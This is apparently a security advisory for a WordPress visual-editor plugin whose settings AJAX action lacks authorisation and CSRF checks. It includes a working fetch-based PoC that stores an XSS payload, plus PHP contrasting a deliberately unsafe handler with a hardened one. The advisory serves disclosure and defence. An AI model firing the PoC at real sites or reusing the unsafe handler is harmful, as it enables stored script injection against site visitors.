The plugin does not perform authorisation or CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated user, such as a subscriber, to call it and change the plugin's settings, which could lead to a Stored Cross-Site Scripting issue. Note: v1.1.4.7 added the CSRF check; the authorisation check was added in 1.1.4.9.
```js
fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ive_save_general_settings&ive_custom_js=alert(/XSS/)",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

The XSS will be triggered in all frontend pages in the Pro version.
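The two missing checks the advisory describes, shown as an added PHP example of a WordPress AJAX settings handler. This is illustrative code, not the plugin's own source: the handler body, the option name `ive_custom_js`, the nonce action `ive_settings_nonce` and the `nonce` request field are assumptions. The first function reproduces the vulnerable pattern (any logged-in user can reach a `wp_ajax_` action, and nothing verifies who is calling or whether the request originated from the plugin's own settings page); the second adds the CSRF check (`check_ajax_referer`) that 1.1.4.7 introduced and the capability check (`current_user_can`) that 1.1.4.9 introduced.

```php
<?php
// Added example, not the plugin's code. Option name, nonce action and
// request field names are assumptions chosen for illustration.

// Vulnerable pattern: any authenticated user can reach a wp_ajax_ action,
// and this handler neither verifies a nonce nor checks a capability, so a
// subscriber (or a CSRF'd admin) can store arbitrary JS in the settings.
function ive_save_general_settings_unsafe() {
    $custom_js = isset( $_POST['ive_custom_js'] ) ? wp_unslash( $_POST['ive_custom_js'] ) : '';
    update_option( 'ive_custom_js', $custom_js ); // later echoed on front-end pages
    wp_send_json_success();
}

// Hardened pattern: CSRF check (nonce) plus authorisation check (capability).
function ive_save_general_settings_safe() {
    // CSRF: the settings page must send a nonce created with
    // wp_create_nonce( 'ive_settings_nonce' ) in the 'nonce' field;
    // check_ajax_referer() terminates the request with HTTP 403 on failure.
    check_ajax_referer( 'ive_settings_nonce', 'nonce' );

    // Authorisation: only users allowed to manage site options may change
    // plugin settings. A nonce alone is not enough, since any logged-in
    // user who can obtain one (e.g. from a shared page) would still pass.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    $custom_js = isset( $_POST['ive_custom_js'] ) ? wp_unslash( $_POST['ive_custom_js'] ) : '';
    update_option( 'ive_custom_js', $custom_js );
    wp_send_json_success();
}

// Register only the hardened handler. Note there is deliberately no
// wp_ajax_nopriv_ registration: unauthenticated users should never reach it.
add_action( 'wp_ajax_ive_save_general_settings', 'ive_save_general_settings_safe' );
```

Both checks are needed: the nonce stops a cross-site request made with the victim's cookies, and the capability check stops a low-privileged account from calling the action directly, which is exactly what the PoC above does.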
CPE

| Name | Operator | Version |
|---|---|---|
| ibtana-visual-editor | lt | 1.1.4.9 |